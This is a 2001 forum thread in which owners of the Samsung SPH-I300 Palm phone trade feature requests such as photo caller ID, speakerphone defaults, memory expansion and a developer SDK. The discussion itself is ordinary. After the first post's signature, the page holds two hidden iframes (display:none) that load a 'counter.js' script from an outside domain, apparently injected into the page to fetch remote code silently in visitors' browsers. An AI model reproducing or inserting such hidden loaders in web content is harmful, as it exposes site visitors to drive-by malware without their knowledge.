+ Reply to Thread
Page 1 of 8 1 2 3 4 5 ... LastLast

Post Official Feature Request Thread

Ok, so we all love our new phones. And Samsung has done a good job in getting this product to market. Now, let's help them make it even better.

On other forums that I participate in, they often generate lists of requested features - generally things that will make the phone better for everyone (not just one specific person's needs) - in the hopes that they can get that list to the manufacturer.

So, I thought we might start out a similar thread here for what will hopefully be an updated software release sometime down the road (I'm guessing Samsung will hope to upgrade their phones before Handspring comes out with the color Treo).

I'll kick off the list -- here's a few of the things that I'd like to see from Samsung in any future software updates:

1. Better interface design - with the exception of the dialpad, the existing interface is functional but very spartan. I like functional, and am glad that they spent time getting it to work first before making it pretty. Well, it works -- so now, a bit of touch up work on the visuals would really make the phone better. Personally, I like the interfaces that I've seen for the VisorPhone. This shouldn't take much more effort than hiring a graphic design team to improve the interfaces with nice colors, graphics, etc. This could be an easy 1.1 upgrade.

2. The ability to customize graphics and ringers. People go nuts for this kind of stuff - just look at the number of skins available for WinAmp, or the myriad of custom ringers available for other types of phones. Make these items extensible for users, and they'll love it.

3. Photo Caller-ID. Ok, I admit - there's no real "business need" for this one, but it seems like it would be such an easy application to write. The phone is capturing the caller ID info already and comparing it to the address book - just go one step further and see if there's a graphic image associated (somehow) with that address book entry. If there is, display it at the same time you display the caller's name and number.

4. Release API information (or SDK's) for interfacing from the phone to the palm, and from the palm to the phone, so that application developers can extend this platform even further.

5. Filtering incoming text messages is awesome - even better would be the ability to changing the ringer based on text within the message. I receive many text pages a day. Some are simply status updates, and others are things I should look at immediately. The TimePort P935 allows a significant amount of flexibility for customizing alerts (rings/vibrates) based on the content of the message. The I300 can already do filtering based on the text of the message -- just add the ability to make a customized ring tone for it.

6. An option for a better screen. Just like laptop manufacturers who used to offer the same laptop with "active matrix" and "passive matrix" screen options, I would be willing to pay extra to have a phone with the screen quality of the Visor Prism. I miss that beautiful screen most of all! Maybe an "SPH-I300+" model.

That's all for the moment. Let's add more improvements (not bugfixes, we can track that elsewhere) so that Samsung can make this into a killer phone!

-Doug<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Last edited by dtoombs; 11-07-2001 at 02:30 PM.

1. You should be able to adjust the ringer volume while the screen is off.

2. Photo Caller-Id

3. You should be able to not have the phone default to "no-speakerphone" and low volume after each call (i.e., you have to turn the speakerphone on each call).

4. Some better way to one-hand dial (it takes too long if you have a huge address book).

5. Some way to disconnect from calls and the internet when the screen is off.

The big two:

thumb-friendly side-mounted scrollwheel... preferably pressable (like most wheel mouse buttons) and configured to go to the address book with a double-click, and dial the selected number after a held-down double-click (two clicks, with the dial continuing to be pressed for a half second or so afterward as confirmation)

memory stick expansion

"While they're at it"

mp3 playback. Don't laugh. Add the memory stick, and it'll already have 90% of the hardware it needs... add a second DAC and amp channel, do a little creative wiring to permit the headset jack to do double-duty with a 1/8" adapter attached to normal headphones, and it'll be ready to rock.

Assuming the i300's unique connector doesn't catch on and become wildly popular with accessory manufacturers, using the new Palm universal connector would be nice.

and the two that go without saying...

flash ROM and PalmOS4

3G data

Dan
    1. The ability to initiate a call in speakerphone mode. For example, if I double-click the voice dial button (or something similar) it immediately goes into speakerphone mode. Other phones do this. It bothers me that I can't even switch into speakerphone mode until the call is connected.

2. Customizable caller id defaults. In this instance what's happening is I have several people with the same "work" phone number in my phone book, and the caller id just defaults to who's first alphabetically.

3. The ability to disconnect a call with the screen off. I know masonuc mentioned it, but I must reiterate it because it's so terribly annoying.

4. API/SDK. The thing that dtoombs didn't mention is that if this were available, you could easily write your own "phone" application and not ever use the Samsung one - add whatever features you want!

5. This would probably be solved with #4, but just in case: I want my Palm applications to be able to use the graffiti area as application space.

6. I must also agree strongly with the customized images and ringers.

7. Some sort of memory expansion. MMC, CF, SmartMedia, whatever.

8. I want the ability to turn the vibration on for ALL speaker volumes, not just the loudest. Here's why: I want it nice and quiet while it sits on my desk at work or at home, so the lowest volume setting is adequate. However, when it's in my pocket while I'm out I want it on vibrate. I don't want to be changing it all the time.

Hmm.. That's all I can think of for now. I'm sure I'll have more later, though!
    Last edited by Dan; 11-07-2001 at 02:14 PM.

Originally posted by Dan
    5. This would probably be solved with #4, but just in case: I want my Palm applications to be able to use the graffiti area as application space.
    Are there any applications available today that can take advantage of the full screen on the HandEra (also has a virtual grafitti area)? It might not be a fault of the phone, it may simply be the fact that there are no applications out there that currently know how to cope with a virtual graffitti area.

I'll post a question on the HandEra forum over on pdabuzz and see if any answers come back.

-Doug

Dan
    I'm guessing it's both. Since applications don't have the need to address this area in most instances, they don't even try. But also, it may be a weird proprietary thing... Maybe the application can't access it without a special API call.

usb port, which would allow sync'ing to the deskop, AND ability to plug in usb devices....

some kind of memory slot, compact flash, smartmedia, memory stick.....

ability to play mp3's from the expansion slot...

faster connect speeds for network access..... 3g

internal antenna..

Brooks

Wink

Uhhh...

All this sounds great but I'll settle for a better battery life before any of these (all of which will eat more batteries for breakfast).

a real dial keypad

My picks for what I consider doable mods in SW.

1. The ability to initiate a call in speakerphone mode.
    2. The ability to disconnect a call with the screen off.
    3. I want the ability to turn the vibration on for ALL speaker volumes.
    4. Speakerphone volume default volume settable.
    5. Ability to assign a button combo to a keylock/unlock function and/or other phone functions. Maybe use a button as a function key.
    6. Better one hand dialing

Originally posted by krolikoski
    My picks for what I consider doable mods in SW
    I agree that in order to be realistic, and have a hope that some of these changes will take place, let's stick to software changes.

The only thing so far I can think of that has not already been mentioned is: the ability to paste a phone number, or mark text anywhere and dial it.

Dan
    Originally posted by robdes
    a real dial keypad
    Actually, the soft keypad is one of my favorite features. You have no idea how much I hate those awful little flip-down dialer guys. It was the biggest drawback I could see to the 6035 (besides the fact it feels bigger... It actually isn't by much but I think that the fact that the sides on the 6035 are convex compared to the i300 which are concave makes a big "perception" difference). I've been dying for a palm phone with a soft dialpad.

Dan
    Originally posted by fikse
    usb port, which would allow sync'ing to the deskop, AND ability to plug in usb devices....
    Actually, by the definition of USB only half what you ask is possible. Everything I've read indicates that USB is a master/slave environment. What this means is that if you have your desktop (USB Master) plug into your i300 (USB Slave) you cannot then have other USB Slaves plug into your i300. Consequently, if you have your i300 (USB Master) plug into devices (USB Slaves) you cannot then plug it into your desktop. It's a crying shame, too.

I remember there was this big hoorah when the iPaq came out and it was USB but then everyone realized you can't plug anything but a computer into it and it seemed a little less impressive somehow.

I previously had the Omnisky before the I300. I neat feature of their service was their portal. It was well organized. I believe Verizon is offering this Portal service for $10/month for the 6035. (Nice portal but is it worth $10/mon? Not sure about that.). A nice feature was called "Onetap"For example if you looked up someones address by doing a person search, you could paste into a contact with a touch of a button. Second thing is you were in Mapquest you could copy the directions into a memo with the touch of a button.

I second the motion for the dislike of the flip. I have use both and prefer the softpad. I like the big numbers with my reading sight being poor. I've had the phone for a week, and the display looks fine. I had fears that the screen would be a filthy mess but it hasn't happen. The slightly smaller form factor of I300 is also a plus. I didn't think it would make a difference, but I guess every mm counts. Also the Brando screen protecter is working great. No visable fingerprints even after using it for a week without cleaning. Not sure why it's staying so clean.

An added plus with the softpad is it can double as a nightlight. It is sure bright in a dark room! Someone needs to develop a SW program that flashes the display in case you are stranded at night on a dark road.

Originally posted by krolikoski
    My picks for what I consider doable mods in SW.

2. The ability to disconnect a call with the screen off.

6. Better one hand dialing

you probably already know this, but i'll say it anyways. you can hang/up or disconnect a call byhitting the side phone button twice.

i agree there should be better way to one hand dial from the address book.

lance

I would like to see more customization on message notification. If I get a voice mail or a text message, I want the phone to alert me ever 3 minutes or so that I have some sort of message I need to check, until I check it. If I leave my phone for even a short period of time, I have to check my phone to see if I missed something. I want the phone to tell me if I have missed something.

I'd also like the led to blink GREEN when I have service, and stay on solid when I am in a call. I burned up an hour of time because I did not realize I had not disconnect from a data call. A solid green light would have been an indication.
    Carl

Carl, how about setting what is called on the '35 "idle timeout", to immediate? When the data call is finished, the call is ended. You will never have to worry about leaving it on. Works for me. I know, lots of you want to keep doing something else, so log in again. We sure do not like it when the call stayed connected w/o us realizing it. Hey Carl?

Sounds

There needs to be a bigger difference between High and Low volumes of the palmOS sounds. They all sound pretty loud to me. High, Medium, and Low seem to sound more like different tones than different volumes.

Phone System Software Enhancements

These are all software related, so they most likely could be included in a system upgrade.

-- Ability dial a number from Datebook, ToDo, or Memopad by highlighting the number and using a "drop down" command to dial. Currently, the only numbers that can be dialed must be in the 5 entry fields of the phone book. This would be helpful for dialing passwords and other numbers that are prompted during a phone call to an automated telephone system.
    -- Ability to "cut & paste" a number into the "phone mode".
    -- Ability to enter "tones" from the note area in the Address Book during a phone call. To enter passwords & account numbers during a call using a "drop down" command after highlighting a number.
    -- Add airtime usage data to the call logs. This data is common on most cell phones. To my knowledge, the I300 does not keep track of the airtime of the last call, individual calls, or the total airtime.

On most cell phones, you can save a phone number after punching it in. I don't think that the I300 lets you do that. I think that you must return to Address Book and manually Graffiti in the number that you just dialed.--I just discovered that you can do this by hitting the call list icon at the bottom of the phone pad. From the Outgoing Call list, you can save any of your outgoing calls to Address Book. Pretty neat.

+ Reply to Thread
Page 1 of 8 1 2 3 4 5 ... LastLast